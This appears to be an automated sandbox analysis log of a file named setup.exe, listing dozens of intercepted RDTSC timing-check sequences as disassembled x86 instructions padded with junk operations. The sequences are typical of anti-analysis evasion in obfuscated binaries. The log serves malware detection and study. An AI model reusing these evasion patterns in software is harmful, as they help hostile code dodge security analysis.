                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F13EC0 second address: F13ECC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F13ECC second address: F13ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F31818 second address: F3181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F3181C second address: F3182E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF32CFB71F6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F3182E second address: F31840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F31840 second address: F31844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F31F56 second address: F31F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F320D9 second address: F320F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7203h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F320F7 second address: F320FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F320FB second address: F32121 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FF32CFB7209h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F33F1C second address: F33F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F36AFF second address: F36B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F36B04 second address: F36B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx edx, si 0x0000000f movzx edx, cx 0x00000012 push 00000004h 0x00000014 or dh, 00000018h 0x00000017 pushad 0x00000018 add dword ptr [ebp+124610D8h], ecx 0x0000001e mov edi, 51B18799h 0x00000023 popad 0x00000024 push 1DB18ED8h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F36B45 second address: F36B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F36E12 second address: F36E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F382E3 second address: F382F6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CFB71FEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB0008 second address: 4DB000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB000C second address: 4DB0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB0012 second address: 4DB0046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 call 00007FF32CDD6577h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF32CDD656Eh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB0046 second address: 4DB0055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB0055 second address: 4DB005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB005B second address: 4DB005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB005F second address: 4DB0063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB0063 second address: 4DB00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF32CFB7208h 0x00000014 jmp 00007FF32CFB7205h 0x00000019 popfd 0x0000001a call 00007FF32CFB7200h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB00B2 second address: 4DB00FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FF32CDD656Dh 0x00000013 pushfd 0x00000014 jmp 00007FF32CDD6570h 0x00000019 and eax, 661CAAA8h 0x0000001f jmp 00007FF32CDD656Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB00FC second address: 4DB0114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB7204h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90E36 second address: 4D90E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90E3A second address: 4D90E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90E40 second address: 4D90E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6572h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90E56 second address: 4D90E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF32CFB7207h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB7205h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D700C3 second address: 4D700C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D700C9 second address: 4D700CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D700CD second address: 4D70135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF32CDD6576h 0x00000012 push dword ptr [ebp+04h] 0x00000015 jmp 00007FF32CDD6570h 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FF32CDD656Dh 0x00000025 jmp 00007FF32CDD6570h 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70182 second address: 4D701A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF32CFB7207h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D701A8 second address: 4D701C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90C24 second address: 4D90C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 pushad 0x00000007 movzx ecx, dx 0x0000000a mov edi, 786A2838h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FF32CFB7201h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov ebx, 470ECAAEh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF32CFB7200h 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90C69 second address: 4D90C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90C6F second address: 4D90C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90C73 second address: 4D90C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D907D4 second address: 4D9084B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CFB7200h 0x00000008 sbb cx, A018h 0x0000000d jmp 00007FF32CFB71FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FF32CFB7202h 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 jmp 00007FF32CFB71FEh 0x00000026 pushfd 0x00000027 jmp 00007FF32CFB7202h 0x0000002c adc ch, FFFFFFD8h 0x0000002f jmp 00007FF32CFB71FBh 0x00000034 popfd 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D9084B second address: 4D90853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA01E8 second address: 4DA01ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA01ED second address: 4DA0206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6575h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0206 second address: 4DA0296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF32CFB71FEh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007FF32CFB7201h 0x00000018 mov edx, ecx 0x0000001a pop esi 0x0000001b pushad 0x0000001c mov ax, dx 0x0000001f popad 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 jmp 00007FF32CFB71FEh 0x00000028 pushfd 0x00000029 jmp 00007FF32CFB7202h 0x0000002e sub si, 99A8h 0x00000033 jmp 00007FF32CFB71FBh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF32CFB7205h 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0296 second address: 4DA02B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA02B3 second address: 4DA02B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA02B9 second address: 4DA02BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DE001B second address: 4DE0021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DE0021 second address: 4DE0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DE0025 second address: 4DE0029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DE0029 second address: 4DE0087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF32CDD6579h 0x00000012 sbb al, 00000036h 0x00000015 jmp 00007FF32CDD6571h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FF32CDD6570h 0x00000021 xor ax, B758h 0x00000026 jmp 00007FF32CDD656Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DE0087 second address: 4DE008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DE008D second address: 4DE00F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF32CDD6573h 0x00000013 add ax, B2CEh 0x00000018 jmp 00007FF32CDD6579h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop edi 0x00000020 popad 0x00000021 mov dx, si 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007FF32CDD6576h 0x0000002c pop ebp 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov esi, 2371CB53h 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB0425 second address: 4DB0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF32CFB7202h 0x00000012 mov eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7207h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB0460 second address: 4DB04DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d mov ax, A163h 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007FF32CDD656Fh 0x00000018 xor ax, D38Eh 0x0000001d jmp 00007FF32CDD6579h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 jmp 00007FF32CDD6577h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bh, 56h 0x00000034 mov si, 6113h 0x00000038 popad 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90642 second address: 4D90651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90651 second address: 4D90657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D90657 second address: 4D9065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0E91 second address: 4DA0E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0E97 second address: 4DA0E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DB02A1 second address: 4DB02A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0777 second address: 4DD077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD077B second address: 4DD078E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD078E second address: 4DD0794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0794 second address: 4DD0798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0798 second address: 4DD07CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FF32CFB7204h 0x00000014 sbb cl, 00000068h 0x00000017 jmp 00007FF32CFB71FBh 0x0000001c popfd 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD07CA second address: 4DD0800 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FF32CDD6572h 0x00000010 mov ebp, esp 0x00000012 jmp 00007FF32CDD6570h 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0800 second address: 4DD0804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0804 second address: 4DD0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0808 second address: 4DD080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD080E second address: 4DD0870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 74h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6577h 0x0000000b or ecx, 12DC386Eh 0x00000011 jmp 00007FF32CDD6579h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FF32CDD6571h 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF32CDD656Dh 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0870 second address: 4DD0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov eax, edi 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0893 second address: 4DD08F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c push esi 0x0000000d mov dl, 54h 0x0000000f pop ecx 0x00000010 pushfd 0x00000011 jmp 00007FF32CDD656Fh 0x00000016 xor ch, FFFFFFEEh 0x00000019 jmp 00007FF32CDD6579h 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007FF39F3B95F0h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF32CDD656Dh 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD08F1 second address: 4DD0919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d jmp 00007FF32CFB7202h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0919 second address: 4DD091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD091D second address: 4DD0937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0937 second address: 4DD0967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FF32CDD6576h 0x00000011 ror eax, cl 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0967 second address: 4DD096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD096B second address: 4DD0971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0971 second address: 4DD09D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 mov edi, 55AB2E82h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e jmp 00007FF32CFB7209h 0x00000013 retn 0004h 0x00000016 nop 0x00000017 mov esi, eax 0x00000019 lea eax, dword ptr [ebp-08h] 0x0000001c xor esi, dword ptr [00C82014h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 lea eax, dword ptr [ebp-10h] 0x00000028 push eax 0x00000029 call 00007FF331147BA1h 0x0000002e push FFFFFFFEh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FF32CFB7203h 0x00000039 add ch, FFFFFFDEh 0x0000003c jmp 00007FF32CFB7209h 0x00000041 popfd 0x00000042 mov eax, 47CE25A7h 0x00000047 popad 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD09D7 second address: 4DD0A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ecx, 477649BBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 mov al, 35h 0x00000012 popad 0x00000013 ret 0x00000014 nop 0x00000015 push eax 0x00000016 call 00007FF330F66F5Ah 0x0000001b mov edi, edi 0x0000001d jmp 00007FF32CDD6572h 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
